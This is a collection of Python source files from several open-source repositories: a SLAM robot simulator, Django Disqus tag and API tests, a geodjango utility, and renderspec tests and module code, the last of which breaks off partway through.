{
"source": "jesus-a-martinez-v/slam",
"score": 4
}
|
#### File: jesus-a-martinez-v/slam/Robot.py
```python
import random
# This robot lives in 2D, x-y space, and its motion is
# pointed in a random direction, initially.
# It moves in a straight line until it comes close to a wall
# at which point it stops.
#
# For measurements, it senses the x- and y-distance
# to landmarks. This is different from range and bearing as
# commonly studied in the literature, but this makes it much
# easier to implement the essentials of SLAM without
# cluttered math.
class Robot:
def __init__(self, world_size=100.0, measurement_range=30.0,
motion_noise=1.0, measurement_noise=1.0):
"""
Creates a robot with the specified parameters and initializes
the location (self.x, self.y) to the center of the world
:param world_size: World size along each dimension.
:param measurement_range: The max distance the robot is able to sense along each axis.
:param motion_noise: Motion sensor noise.
:param measurement_noise: Measurement sensor noise.
"""
self.world_size = world_size
self.measurement_range = measurement_range
self.x = world_size / 2.0
self.y = world_size / 2.0
self.motion_noise = motion_noise
self.measurement_noise = measurement_noise
self.landmarks = []
self.num_landmarks = 0
# returns a random float in the range [-1.0, 1.0)
def _rand(self):
return random.random() * 2.0 - 1.0
# --------
# move: attempts to move robot by dx, dy. If outside world
# boundary, then the move does nothing and instead returns failure
#
def move(self, dx, dy):
"""
Attempts to move robot by dx, dy. If outside world
boundary, then the move does nothing and instead returns failure
:param dx: x-axis delta.
:param dy: y-axis delta.
:return: True if the robot was able to move, False otherwise.
"""
x = self.x + dx + (self._rand() * self.motion_noise)
y = self.y + dy + (self._rand() * self.motion_noise)
if (x < 0.0 or x > self.world_size) or (y < 0.0 or y > self.world_size):
return False
else:
self.x = x
self.y = y
return True
def sense(self):
"""
This function does not take in any parameters; instead, it references internal variables
(such as self.landmarks) to measure the distance between the robot and any landmarks
that the robot can see (that are within its measurement range).
This function returns a list of landmark indices, and the measured distances (dx, dy) between the robot's
position and said landmarks.
One item in the returned list should be in the form: [landmark_index, dx, dy].
"""
all_landmarks_within_range = self.measurement_range == -1
measurements = []
for index, (landmark_x, landmark_y) in enumerate(self.landmarks):
dx = (landmark_x - self.x) + (self._rand() * self.measurement_noise)
dy = (landmark_y - self.y) + (self._rand() * self.measurement_noise)
is_landmark_within_range = (all_landmarks_within_range or
(abs(dx) <= self.measurement_range) and
(abs(dy) <= self.measurement_range))
if is_landmark_within_range:
measurements.append([index, dx, dy])
return measurements
def make_landmarks(self, num_landmarks):
"""
Makes random landmarks located in the world.
:param num_landmarks: Number of landmarks to randomly place in the world.
"""
self.landmarks = []
for i in range(num_landmarks):
self.landmarks.append([round(random.random() * self.world_size),
round(random.random() * self.world_size)])
self.num_landmarks = num_landmarks
# called when print(robot) is called; prints the robot's location
def __repr__(self):
return 'Robot: [x=%.5f y=%.5f]' % (self.x, self.y)
```
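A minimal usage sketch for the `Robot` class above; the constructor arguments, move deltas, and landmark count are arbitrary illustration values, not figures taken from the original project.
```python
# Illustration only: exercising the Robot class defined above.
r = Robot(world_size=100.0, measurement_range=30.0,
          motion_noise=1.0, measurement_noise=1.0)
r.make_landmarks(5)             # scatter 5 random landmarks in the world
moved = r.move(10.0, -5.0)      # noisy move; returns False if it would leave the world
measurements = r.sense()        # [[landmark_index, dx, dy], ...] for landmarks in range
print(r, moved, measurements)
```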
|
{
"source": "JesusAnaya/django-disqus",
"score": 2
}
|
#### File: django-disqus/disqus/tests.py
```python
import unittest
import json
import base64
import hashlib
import hmac
from django.conf import settings
if not settings.configured:
settings.configure()
from django.contrib.sites.models import Site
from django.test.utils import override_settings
from unittest import TestCase
try:
from unittest import mock
except ImportError:
import mock
from disqus.api import DisqusClient, DisqusException
from django.utils.six.moves.urllib.error import URLError
from django.utils.six.moves.urllib.parse import parse_qs, urlparse
from django.template import Context, Template
from disqus.templatetags.disqus_tags import (
set_disqus_developer,
set_disqus_identifier,
set_disqus_url,
set_disqus_title,
set_disqus_category_id,
get_config,
disqus_sso,
disqus_dev
)
class FakeRequest(object):
def __init__(self, path):
self.path = path
# mock Site
class FakeSiteManager(object):
def __init__(self, domain, name):
self.site = Site(domain=domain, name=name)
def get_current(self):
return self.site
class FakeUrlopen(mock.Mock):
def read(self, *args, **kwargs):
return '''
{
"message": [
{
"created_at": "2007-07-31 17:44:00",
"shortname": "disqus",
"description":
"The official Disqus forum. [...]",
"id": "NN", "name": "DISQUS Blog and Forum"
},
{
"created_at": "2008-09-10 14:37:31.744838",
"shortname": "antonkovalyov",
"description": "",
"id": "NN",
"name": "<NAME>"
}
],
"code": "ok",
"succeeded": true
}
'''
class FakeUrlopenNegative(mock.Mock):
def read(self, *args, **kwargs):
return '{"message":"message content","succeeded":false}'
class FakeAnonUser(mock.Mock):
def is_anonymous(self):
return True
class FakeUser(mock.Mock):
id = '1'
username = 'flin'
email = '<EMAIL>'
def is_anonymous(self):
return False
class DisqusTemplatetagsTest(TestCase):
def setUp(self):
self.real_sites_manager = Site.objects
self.context = {
'request': 'some_request',
'disqus_developer': 'some_developer',
'disqus_identifier': 'some_id',
'disqus_url': '//bestsiteever.ten',
'disqus_title': 'test title',
'disqus_category_id': 'test category'
}
def tearDown(self):
Site.objects = self.real_sites_manager
# Note: this is not a tag.
def test_get_config(self):
js = get_config(self.context)
self.assertIn('var disqus_developer = "some_developer";', js)
self.assertIn('var disqus_identifier = "some_id";', js)
self.assertIn('var disqus_category_id = "test category";', js)
self.assertNotIn('var request = "some_request";', js)
self.assertEqual(len(js.split('\n')), 5)
def test_set_disqus_developer(self):
set_disqus_developer(self.context, 'Guido')
self.assertEqual(self.context['disqus_developer'], 'Guido')
def test_set_disqus_identifier(self):
set_disqus_identifier(self.context, 'spam', 'ham', 'eggs')
self.assertEqual(self.context['disqus_identifier'], 'spamhameggs')
def test_set_disqus_url(self):
set_disqus_url(self.context, 'spam', 'ham', 'eggs')
self.assertEqual(self.context['disqus_url'], 'spamhameggs')
def test_set_disqus_title(self):
set_disqus_title(self.context, 'Holy Grail')
self.assertEqual(self.context['disqus_title'], 'Holy Grail')
def test_set_disqus_category_id(self):
set_disqus_category_id(self.context, 'Monty Python')
self.assertEqual(self.context['disqus_category_id'], 'Monty Python')
@override_settings(DEBUG=True)
def test_disqus_dev_sets_full_url(self):
template = Template("""
{% load disqus_tags %}
{% disqus_dev %}
"""
)
test_domain = 'example.org'
url_path = '/path/to/page'
# mock out Site manager
Site.objects = FakeSiteManager(test_domain, 'test')
context = {'request': FakeRequest(path=url_path)}
generated_html = template.render(Context(context))
full_url = '//{}{}'.format(test_domain, url_path)
self.assertIn(full_url, generated_html)
self.assertIn('var disqus_developer = 1;', generated_html)
self.assertEqual(disqus_dev(context), {'disqus_url': full_url})
@override_settings(DEBUG=False)
def test_disqus_dev_if_debug_is_false(self):
template = Template("""
{% load disqus_tags %}
{% disqus_dev %}
"""
)
test_domain = 'example.org'
url_path = '/path/to/page'
context = {'request': FakeRequest(path=url_path)}
Site.objects = FakeSiteManager(test_domain, 'test')
generated_html = template.render(Context(context))
full_url = '//{}{}'.format(test_domain, url_path)
self.assertNotIn(full_url, generated_html)
self.assertEqual(disqus_dev(context), {})
@override_settings(DISQUS_SECRET_KEY=None, DISQUS_PUBLIC_KEY=True)
def test_disqus_sso_if_there_is_no_secret_key(self):
msg = 'You need to set DISQUS_SECRET_KEY before you can use SSO'
output = disqus_sso({})
self.assertIn(msg, output)
@override_settings(DISQUS_PUBLIC_KEY=None, DISQUS_SECRET_KEY=None)
def test_disqus_sso_if_there_is_no_public_key_and_no_secret_key(self):
msg = 'You need to set DISQUS_SECRET_KEY before you can use SSO'
output = disqus_sso({})
self.assertIn(msg, output)
@override_settings(DISQUS_PUBLIC_KEY=None, DISQUS_SECRET_KEY=True)
def test_disqus_sso_if_there_is_no_public_key(self):
msg = 'You need to set DISQUS_PUBLIC_KEY before you can use SSO'
output = disqus_sso({})
self.assertIn(msg, output)
@override_settings(DISQUS_PUBLIC_KEY=True, DISQUS_SECRET_KEY=True)
def test_disqus_sso_if_user_is_anonymous(self):
context = {'user': FakeAnonUser()}
output = disqus_sso(context)
self.assertEqual(output, '')
@mock.patch('disqus.templatetags.disqus_tags.time.time', lambda: 1420070400)
@override_settings(DISQUS_PUBLIC_KEY='a'*64, DISQUS_SECRET_KEY='b'*64)
def test_disqus_sso_if_all_inner_tests_passed(self):
t = Template("{% load disqus_tags %} {% disqus_sso %}")
user = FakeUser()
context = {'user': user}
output = t.render(Context(context))
pub_key = 'a'*64
private_key = 'b'*64
timestamp = 1420070400
data = json.dumps({
'id': user.id,
'username': user.username,
'email': user.email,
})
message = base64.b64encode(data.encode('utf-8'))
msg = ('%s %s' % (message, timestamp)).encode('utf-8')
sig = hmac.HMAC(
private_key.encode('utf-8'),
msg,
hashlib.sha1).hexdigest()
self.assertIn('disqus_config', output)
self.assertIn('remote_auth_s3', output)
self.assertIn(message.decode('utf-8'), output)
self.assertIn(sig, output)
self.assertIn(str(timestamp), output)
self.assertIn('api_key = "{}"'.format(pub_key), output)
def test_disqus_num_replies_without_settings(self):
t1 = Template("{% load disqus_tags %} {% disqus_num_replies %}")
t2 = Template("""{% load disqus_tags %}
{% disqus_num_replies 'foobar' %}""")
render1 = t1.render(Context({}))
render2 = t2.render(Context(self.context))
self.assertIn("var disqus_shortname = '';", render1)
self.assertIn("var disqus_shortname = 'foobar';", render2)
self.assertIn('var disqus_developer = "some_developer";', render2)
self.assertIn('var disqus_url = "//bestsiteever.ten";', render2)
@override_settings(DISQUS_WEBSITE_SHORTNAME='best_test_site_ever')
def test_disqus_num_replies_with_settings(self):
t1 = Template("{% load disqus_tags %} {% disqus_show_comments %}")
t2 = Template("""{% load disqus_tags %}
{% disqus_show_comments 'foobar' %}""")
render1 = t1.render(Context({}))
render2 = t2.render(Context(self.context))
self.assertIn("var disqus_shortname = 'best_test_site_ever';", render1)
self.assertNotIn("var disqus_shortname = 'foobar';", render1)
self.assertIn("var disqus_shortname = 'best_test_site_ever';", render2)
self.assertIn('var disqus_identifier = "some_id";', render2)
self.assertIn('var disqus_title = "test title";', render2)
def test_disqus_recent_comments_without_settings(self):
t1 = Template("{% load disqus_tags %} {% disqus_recent_comments %}")
t2 = Template("{% load disqus_tags %} \
{% disqus_recent_comments shortname='foobar' \
num_items=7 \
excerpt_length=400 \
hide_avatars=1 \
avatar_size=50 %}"
)
render1 = t1.render(Context({}))
render2 = t2.render(Context(self.context))
self.assertIn("var disqus_shortname = '';", render1)
self.assertIn("num_items=5", render1)
self.assertIn("excerpt_length=200", render1)
self.assertIn("hide_avatars=0", render1)
self.assertIn("avatar_size=32", render1)
self.assertIn("var disqus_shortname = 'foobar';", render2)
self.assertIn("num_items=7", render2)
self.assertIn("excerpt_length=400", render2)
self.assertIn("hide_avatars=1", render2)
self.assertIn("avatar_size=50", render2)
self.assertIn('var disqus_category_id = "test category";', render2)
self.assertIn('var disqus_url = "//bestsiteever.ten";', render2)
@override_settings(DISQUS_WEBSITE_SHORTNAME='best_test_site_ever')
def test_disqus_recent_comments_with_settings(self):
t1 = Template("{% load disqus_tags %} {% disqus_recent_comments %}")
t2 = Template("{% load disqus_tags %} \
{% disqus_recent_comments shortname='foobar' \
num_items=7 \
excerpt_length=400 \
hide_avatars=1 \
avatar_size=50 %}"
)
render1 = t1.render(Context({}))
render2 = t2.render(Context(self.context))
self.assertIn("var disqus_shortname = 'best_test_site_ever';", render1)
self.assertIn("num_items=5", render1)
self.assertIn("excerpt_length=200", render1)
self.assertIn("hide_avatars=0", render1)
self.assertIn("avatar_size=32", render1)
self.assertIn("var disqus_shortname = 'best_test_site_ever';", render2)
self.assertIn("num_items=7", render2)
self.assertIn("excerpt_length=400", render2)
self.assertIn("hide_avatars=1", render2)
self.assertIn("avatar_size=50", render2)
self.assertIn('var disqus_category_id = "test category";', render2)
self.assertIn('var disqus_url = "//bestsiteever.ten";', render2)
def test_disqus_show_comments_without_settings(self):
t1 = Template("{% load disqus_tags %} {% disqus_show_comments %}")
t2 = Template("""{% load disqus_tags %}
{% disqus_show_comments 'foobar' %}""")
render1 = t1.render(Context({}))
render2 = t2.render(Context(self.context))
self.assertIn("var disqus_shortname = '';", render1)
self.assertIn("var disqus_shortname = 'foobar';", render2)
self.assertIn('var disqus_developer = "some_developer";', render2)
self.assertIn('var disqus_url = "//bestsiteever.ten";', render2)
@override_settings(DISQUS_WEBSITE_SHORTNAME='best_test_site_ever')
def test_disqus_show_comments_with_settings(self):
t1 = Template("{% load disqus_tags %} {% disqus_show_comments %}")
t2 = Template("""{% load disqus_tags %}
{% disqus_show_comments 'foobar' %}""")
render1 = t1.render(Context({}))
render2 = t2.render(Context(self.context))
self.assertIn("var disqus_shortname = 'best_test_site_ever';", render1)
self.assertNotIn("var disqus_shortname = 'foobar';", render1)
self.assertIn("var disqus_shortname = 'best_test_site_ever';", render2)
self.assertIn('var disqus_identifier = "some_id";', render2)
self.assertIn('var disqus_title = "test title";', render2)
class DisqusClientTest(TestCase):
def setUp(self):
self.client = DisqusClient()
self.attr = {'user_api_key': 'spam', 'developer_api_key': 'ham'}
def test_init_properly(self):
"""
First, we test if the DisqusClient class can be initialized
and parameters that were passed are set correctly.
"""
c = DisqusClient(foo='bar', bar='foo')
self.assertEqual('bar', c.foo)
self.assertEqual('foo', c.bar)
with self.assertRaises(AttributeError):
c.baz
# XXX bug or feature?
def test_init_if_passed_args_with_name_like_in_METHODS(self):
c = DisqusClient(**DisqusClient.METHODS)
with self.assertRaises(TypeError):
# str is not callable
getattr(c, 'get_thread_list')()
with self.assertRaises(TypeError):
getattr(c, 'get_forum_posts')()
with self.assertRaises(TypeError):
getattr(c, 'moderate_post')()
@mock.patch('disqus.api.DisqusClient.call')
def test_call_method_is_triggered_by_api_methods_from_METHODS(self,
call_mock):
call = getattr(self.client, 'get_user_name')
call(**self.attr)
call_mock.assert_called_with('get_user_name', **self.attr)
call = getattr(self.client, 'get_num_posts')
call(**self.attr)
call_mock.assert_called_with('get_num_posts', **self.attr)
call = getattr(self.client, 'get_thread_by_url')
call(**self.attr)
call_mock.assert_called_with('get_thread_by_url', **self.attr)
@mock.patch('disqus.api.urlopen', new_callable=FakeUrlopen)
@mock.patch('disqus.api.DisqusClient._get_request')
def test__get_request_is_triggered_by_call_method(self,
_get_request_mock,
urlopen_mock):
for method in DisqusClient.METHODS:
url = self.client.api_url % method
call = getattr(self.client, method)
call(**self.attr)
_get_request_mock.assert_called_with(
url, self.client.METHODS[method],
**self.attr)
@mock.patch('disqus.api.urlopen', new_callable=FakeUrlopen)
def test_call_method_if_request_is_succeeded(self, urlopen_mock):
rest_response = '''
{
"message": [
{
"created_at": "2007-07-31 17:44:00",
"shortname": "disqus",
"description":
"The official Disqus forum. [...]",
"id": "NN", "name": "DISQUS Blog and Forum"
},
{
"created_at": "2008-09-10 14:37:31.744838",
"shortname": "antonkovalyov",
"description": "",
"id": "NN",
"name": "<NAME>"
}
],
"code": "ok",
"succeeded": true
}
'''
response_json = json.loads(rest_response)
message = response_json['message']
response = self.client.get_forum_list(user_api_key='spam')
self.assertEqual(response, message)
@mock.patch('disqus.api.urlopen',
new_callable=FakeUrlopenNegative)
def test_call_method_if_request_is_not_succeeded(self, urlopen_mock):
with self.assertRaises(DisqusException):
self.client.get_forum_list()
@mock.patch('disqus.api.DisqusClient._get_request')
def test_call_method_if_during_request_error_occurred(self,
_get_request_mock):
with self.assertRaises(URLError):
self.client.create_post()
def test__get_request_if_http_method_is_get(self):
attr_ = {'user_api_key': ['spam'],
'developer_api_key': ['ham'],
'api_version': ['1.1']
}
for api_method, http_method in DisqusClient.METHODS.items():
if http_method == "GET":
url = self.client.api_url % api_method
request_params = self.client._get_request(
url, http_method,
**self.attr)
request_no_params = self.client._get_request(url, http_method)
self.assertEqual(request_params.get_host(), 'disqus.com')
self.assertEqual(request_no_params.get_host(), 'disqus.com')
# check actual request method
self.assertEqual(request_params.get_method(), http_method)
self.assertEqual(request_no_params.get_method(), http_method)
# getting url's query string
# since parameters are passed to api_url from a dict, their order is arbitrary
url_parsed1 = urlparse(request_params.get_full_url())
qs_params = parse_qs(url_parsed1.query)
url_parsed2 = urlparse(request_no_params.get_full_url())
qs_no_params = parse_qs(url_parsed2.query)
self.assertEqual(qs_params, attr_)
# hardcoded in api_url
self.assertEqual(qs_no_params, {'api_version': ['1.1']})
def test__get_request_if_http_method_is_post(self):
attr_ = {'user_api_key': ['spam'], 'developer_api_key': ['ham']}
for api_method, http_method in DisqusClient.METHODS.items():
if http_method == "POST":
url = self.client.api_url % api_method
request_params = self.client._get_request(url,
http_method,
**self.attr)
request_no_params = self.client._get_request(url, http_method)
self.assertEqual(request_params.get_host(), 'disqus.com')
self.assertEqual(request_no_params.get_host(), 'disqus.com')
self.assertEqual(request_params.get_method(), http_method)
self.assertEqual(request_no_params.get_method(), http_method)
qs_params = parse_qs(request_params.data)
qs_no_params = parse_qs(request_no_params.data)
self.assertEqual(qs_params, attr_)
self.assertEqual(qs_no_params, {})
# XXX maybe an exception should be raised explicitly (DisqusException)
def test__get_request_if_http_method_is_not_post_or_get(self):
url1 = self.client.api_url % 'get_forum_api_key'
url2 = self.client.api_url % 'create_post'
url3 = self.client.api_url % 'foobar'
with self.assertRaises(UnboundLocalError):
self.client._get_request(url1, 'PUSH', **self.attr)
with self.assertRaises(UnboundLocalError):
self.client._get_request(url1, 'PUSH')
with self.assertRaises(UnboundLocalError):
self.client._get_request(url2, 'PUSH', **self.attr)
with self.assertRaises(UnboundLocalError):
self.client._get_request(url2, 'PUSH')
with self.assertRaises(UnboundLocalError):
self.client._get_request(url3, 'PUSH', **self.attr)
with self.assertRaises(UnboundLocalError):
self.client._get_request(url3, 'PUSH')
# XXX Don't know how to implement this, or whether it should be implemented at all.
def test_call_method_if_api_version_passed_as_method_argument(self):
pass
if __name__ == '__main__':
unittest.main()
```
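For reference, the signing scheme that `test_disqus_sso_if_all_inner_tests_passed` reconstructs can be written as a standalone helper. This is a sketch distilled from the test body above, not the implementation shipped in `disqus.templatetags.disqus_tags`; the helper name and arguments are invented for illustration.
```python
import base64
import hashlib
import hmac
import json
import time

def build_remote_auth(user_dict, secret_key):
    # Mirror of the steps in the SSO test above: JSON-encode the user,
    # base64 it, join with a timestamp, and sign with HMAC-SHA1.
    message = base64.b64encode(json.dumps(user_dict).encode('utf-8'))
    timestamp = int(time.time())
    payload = ('%s %s' % (message, timestamp)).encode('utf-8')
    sig = hmac.HMAC(secret_key.encode('utf-8'), payload, hashlib.sha1).hexdigest()
    return message, timestamp, sig
```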
|
{
"source": "JesusAnaya/geodjango-gmaps-widget",
"score": 3
}
|
#### File: geodjango-gmaps-widget/geodjango_gmaps_widget/utils.py
```python
import collections
def dict_update(target_dict, *update_list):
for u in update_list:
if hasattr(u, 'iteritems'):
for k, v in u.iteritems():
if isinstance(v, collections.Mapping):
r = dict_update(target_dict.get(k, {}), v)
target_dict[k] = r
else:
target_dict[k] = u[k]
return target_dict
def class_to_dict(cls):
return dict([(k, getattr(cls, k)) for k in dir(cls)
if not k.startswith('_')])
```
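`dict_update` relies on Python 2 idioms (`iteritems` and `collections.Mapping`), so under Python 2 a call like the following merges nested mappings in place; the dictionaries are made up for illustration.
```python
# Illustration only (Python 2 semantics, since dict_update checks for iteritems):
defaults = {'map': {'zoom': 8, 'type': 'roadmap'}, 'width': 400}
overrides = {'map': {'zoom': 12}}
dict_update(defaults, overrides)
# defaults is now {'map': {'zoom': 12, 'type': 'roadmap'}, 'width': 400}
```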
|
{
"source": "jesusaurus/obs-service-renderspec",
"score": 2
}
|
#### File: obs-service-renderspec/tests/test_base.py
```python
from __future__ import unicode_literals
import imp
import mock
import os
import shutil
import subprocess
import sys
import tempfile
import unittest
# NOTE(toabctl): Hack to import non-module file for testing
sv = imp.load_source("renderspec", "renderspec")
RENDERSPEC_EXECUTABLE = os.path.abspath(
os.path.join(os.path.dirname(__file__), '../', 'renderspec')
)
class RenderspecBaseTest(unittest.TestCase):
"""Basic test class. Other tests should use this one"""
def setUp(self):
self._tmpdir = tempfile.mkdtemp(prefix='obs-service-renderspec-test-')
os.chdir(self._tmpdir)
def _run_renderspec(self, params=[]):
self._tmpoutdir = tempfile.mkdtemp(
prefix='obs-service-renderspec-test-outdir-')
cmd = [sys.executable,
RENDERSPEC_EXECUTABLE,
'--outdir', self._tmpoutdir] + params
try:
subprocess.check_output(
cmd, stderr=subprocess.STDOUT, env=os.environ.copy())
for f in os.listdir(self._tmpoutdir):
os.unlink(self._tmpdir+"/"+f)
# FIXME: in most modes the files are not replaced,
# but stored in parallel with a _service: prefix
shutil.move(self._tmpoutdir+"/"+f, self._tmpdir)
shutil.rmtree(self._tmpoutdir)
except subprocess.CalledProcessError as e:
raise Exception(
"Can not call '%s' in dir '%s'. Error: %s" % (" ".join(cmd),
self._tmpdir,
e.output))
def tearDown(self):
shutil.rmtree(self._tmpdir)
class RenderspecBasics(RenderspecBaseTest):
# patch1 content and corresponding sha256
P1_CONTENT = 'foo'
P1_SHA = '2c26b46b68ffc68ff99b453c1d30413413422d706483bfa0f98a5e886266e7ae'
def _write_patch(self, content, name):
with open(os.path.join(self._tmpdir, name), 'w+') as f:
f.write(content)
def _write_template(self, name, patches=[]):
"""write a template which can be rendered"""
with open(os.path.join(self._tmpdir, name), 'w+') as f:
f.write("""
Name: test
License: Apache-2.0
Version: 1.1.0
Release: 0
Summary: test summary
{patches}
Requires: {{{{ py2pkg("oslo.log") }}}}
%description
test description.
""".format(patches="\n".join(patches)))
def test_help(self):
self._run_renderspec(['-h'])
def test_render(self):
self._write_template('template.spec.j2')
self._run_renderspec(['--input-template', 'template.spec.j2'])
@mock.patch('renderspec._get_changelog_github', return_value=['l1', 'l2'])
def test__get_changelog(self, mock_changelog_github):
changes = sv._get_changelog('gh,openSUSE,obs-service-renderspec',
'1.1.0', '2.2.0')
self.assertEqual(changes, ['l1', 'l2'])
def test__get_changelog_invalid_provider(self):
with self.assertRaises(Exception):
sv._get_changelog('foo,openSUSE,obs-service-renderspec',
'1.1.0', '2.2.0')
def test__get_changes_string_no_changes(self):
s = sv._get_changes_string([], '<EMAIL>')
self.assertEqual(s, None)
s = sv._get_changes_string(None, '<EMAIL>')
self.assertEqual(s, None)
@mock.patch('renderspec._get_changes_datetime',
return_value='Mon Oct 17 05:22:25 UTC 2016')
def test__get_changes_string(self, mock_utcnow):
s = sv._get_changes_string(['l1', ['l2', 'l3'], 'l4'],
'<EMAIL>')
expected = """-------------------------------------------------------------------
Mon Oct 17 05:22:25 UTC 2016 - <EMAIL>
- l1
- l2
- l3
- l4
"""
self.assertEqual(s, expected)
def test__prepend_string_to_file(self):
fn = os.path.join(self._tmpdir, 'prepentd_string_test1')
with open(fn, 'w') as f:
f.write('a line')
sv._prepend_string_to_file('你好', fn)
def test__extract_archive_to_tempdir_no_file(self):
with self.assertRaises(Exception) as e_info:
with sv._extract_archive_to_tempdir("foobar"):
self.assertIn("foobar", str(e_info))
def _write_pbr_json(self, destdir, git_version='6119f6f'):
"""write a pbr.json file into destdir"""
f1 = os.path.join(destdir, 'pbr.json')
with open(f1, 'w+') as f:
f.write('{"git_version": "%s", "is_release": false}' % git_version)
def test__find_pbr_json(self):
tmpdir = tempfile.mkdtemp(prefix='obs-service-renderspec-test_')
try:
self._write_pbr_json(tmpdir)
self.assertEqual(
sv._find_pbr_json(tmpdir),
os.path.join(tmpdir, 'pbr.json')
)
finally:
shutil.rmtree(tmpdir)
def test__get_patch_sha256_from_patchname(self):
patch_name = 'fix1.patch'
self._write_patch(RenderspecBasics.P1_CONTENT, patch_name)
sha = sv._get_patch_sha256_from_patchname(patch_name)
self.assertEqual(sha, RenderspecBasics.P1_SHA)
def test__get_patch_sha256_from_patchname_not_available(self):
"""test when no patch file for the given name is available"""
sha = sv._get_patch_sha256_from_patchname('not-there-patch')
self.assertEqual(sha, None)
def test__get_patch_names_from_spec(self):
patches = ['Patch0: fix1.patch',
'Patch1:fix2.patch',
'Patch100: fix3.patch # comment',
'Patch101: fix4.patch']
# create template and render it so we can get patches from the .spec
self._write_template('template.spec.j2', patches=patches)
self._run_renderspec(['--input-template', 'template.spec.j2'])
patches = sv._get_patch_names_from_spec('template.spec')
self.assertEqual(patches, [
('Patch0', 'fix1.patch'),
('Patch1', 'fix2.patch'),
('Patch100', 'fix3.patch'),
('Patch101', 'fix4.patch'),
])
def test__get_patches(self):
patch_name = 'fix1.patch'
self._write_patch(RenderspecBasics.P1_CONTENT, patch_name)
patches = ['Patch0: {}'.format(patch_name)]
self._write_template('template.spec.j2', patches=patches)
self._run_renderspec(['--input-template', 'template.spec.j2'])
p = sv._get_patches('template.spec')
self.assertEqual(p, {'fix1.patch': RenderspecBasics.P1_SHA})
def test__get_patches_changes_no_patches(self):
changes = sv._get_patches_changes({}, {})
self.assertEqual(changes, {'added': [], 'removed': [], 'updated': []})
def test__get_patches_changes_no_changes(self):
changes = sv._get_patches_changes(
{'fix1.patch': 'sha1111'},
{'fix1.patch': 'sha1111'}
)
self.assertEqual(changes, {'added': [], 'removed': [], 'updated': []})
def test__get_patches_changes_patch_added(self):
changes = sv._get_patches_changes(
{'fix1.patch': 'sha1111'},
{'fix1.patch': 'sha1111', 'fix2.patch': 'sha2222'}
)
self.assertEqual(changes, {'added': ['fix2.patch'],
'removed': [],
'updated': []})
def test__get_patches_changes_patch_removed(self):
changes = sv._get_patches_changes(
{'fix1.patch': 'sha1111', 'fix2.patch': 'sha2222'},
{'fix1.patch': 'sha1111'}
)
self.assertEqual(changes, {'added': [],
'removed': ['fix2.patch'],
'updated': []})
def test__get_patches_changelog_patch_added_and_removed(self):
changes = sv._get_patches_changes(
{'fix1.patch': 'sha1111'},
{'fix2.patch': 'sha2222'}
)
self.assertEqual(changes, {'added': ['fix2.patch'],
'removed': ['fix1.patch'],
'updated': []})
def test__get_patches_changes_patch_updated(self):
changes = sv._get_patches_changes(
{'fix1.patch': 'sha1111'},
{'fix1.patch': 'sha2222'}
)
self.assertEqual(changes, {'added': [],
'removed': [],
'updated': ['fix1.patch']})
if __name__ == '__main__':
unittest.main()
```
|
{
"source": "jesusaurus/renderspec",
"score": 2
}
|
#### File: renderspec/renderspec/__init__.py
```python
from __future__ import print_function
import argparse
import os
import platform
import string
import sys
from jinja2 import Environment
import yaml
from renderspec.distloader import RenderspecLoader
from renderspec import versions
from renderspec import contextfuncs
def generate_spec(spec_style, epochs, requirements, skip_pyversion,
input_template_format, input_template_path, output_path):
"""generate a spec file with the given style and input template"""
if input_template_format == 'spec.j2':
return _renderer_input_template_format_spec(
spec_style, epochs, requirements, skip_pyversion,
input_template_path, output_path)
else:
raise Exception('Unknown input-template-format "%s"' %
input_template_format)
def _renderer_input_template_format_spec(spec_style, epochs, requirements,
skip_pyversion,
input_template_path, output_path):
"""render a 'traditional' .spec.j2 template into a .spec file"""
env = Environment(loader=RenderspecLoader(
template_fn=input_template_path),
trim_blocks=True)
contextfuncs.env_register_filters_and_globals(env)
template_name = '.spec'
if spec_style in env.loader.list_templates():
template_name = spec_style
template = env.get_template(template_name)
input_template_dir = os.path.dirname(os.path.abspath(input_template_path))
if output_path:
output_dir = os.path.dirname(
os.path.abspath(output_path))
else:
output_dir = None
return template.render(spec_style=spec_style, epochs=epochs,
requirements=requirements,
skip_pyversion=skip_pyversion,
input_template_dir=input_template_dir,
output_dir=output_dir)
def _is_fedora(distname):
"""detect Fedora-based distro (e.g Fedora, CentOS, RHEL)"""
distname = distname.lower()
for x in ["fedora", "centos", "red hat"]:
if x in distname:
return True
return False
def _get_default_distro():
distname, _, _ = platform.linux_distribution()
# newer distros only have /etc/os-release and then platform doesn't work
# anymore and upstream does not want to fix it:
# https://bugs.python.org/issue1322
if not distname and 'Linux' in platform.system():
try:
with open('/etc/os-release', 'r') as lsb_release:
for l in lsb_release:
if l.startswith('ID_LIKE='):
distname = l.partition('=')[2].strip(
string.punctuation + string.whitespace)
break
except OSError:
print('WARN: Unable to determine Linux distribution')
if "suse" in distname.lower():
return "suse"
elif _is_fedora(distname):
return "fedora"
else:
return "unknown"
def _get_default_pyskips(distro):
# py3 building is all complicated on CentOS 7.x
if distro == 'fedora':
distname, distver, _ = platform.linux_distribution()
if 'CentOS' in distname and distver.startswith('7'):
return 'py3'
return None
def _get_default_template():
fns = [f for f in os.listdir('.')
if os.path.isfile(f) and f.endswith('.spec.j2')]
if not fns:
return None, ("No *.spec.j2 templates found. "
"See `renderspec -h` for usage.")
elif len(fns) > 1:
return None, ("Multiple *.spec.j2 templates found, "
"please specify one.\n"
"See `renderspec -h` for usage.")
else:
return fns[0], None
def _get_epochs(filename):
"""get a dictionary with pkg-name->epoch mapping"""
epochs = {}
if filename is not None:
with open(filename, 'r') as f:
data = yaml.safe_load(f.read())
epochs.update(data['epochs'])
return epochs
def _get_requirements(filenames):
"""get a dictionary with pkg-name->min-version mapping"""
reqs = {}
for filename in filenames:
with open(filename, 'r') as f:
reqs.update(versions.get_requirements(f.readlines()))
return reqs
def process_args():
distro = _get_default_distro()
parser = argparse.ArgumentParser(
description="Convert a .spec.j2 template into a .spec")
parser.add_argument("-o", "--output",
help="output filename or '-' for stdout. "
"default: autodetect")
parser.add_argument("--spec-style", help="distro style you want to use. "
"default: %s" % (distro), default=distro,
choices=['suse', 'fedora'])
parser.add_argument("--skip-pyversion",
help='Skip requirements for this pyversion',
default=_get_default_pyskips(distro),
choices=['py2', 'py3'])
parser.add_argument("--epochs", help="yaml file with epochs listed.")
parser.add_argument("input-template", nargs='?',
help="specfile jinja2 template to render. "
"default: *.spec.j2")
parser.add_argument("-f", "--input-template-format", help="Format of the "
"input-template file. default: %(default)s",
default="spec.j2", choices=["spec.j2"])
parser.add_argument("--requirements", help="file(s) which contain "
"PEP0508 compatible requirement lines. Last mentioned "
"file has highest priority. default: %(default)s",
action='append', default=[])
return vars(parser.parse_args())
def main():
args = process_args()
# autodetect input/output fns if possible
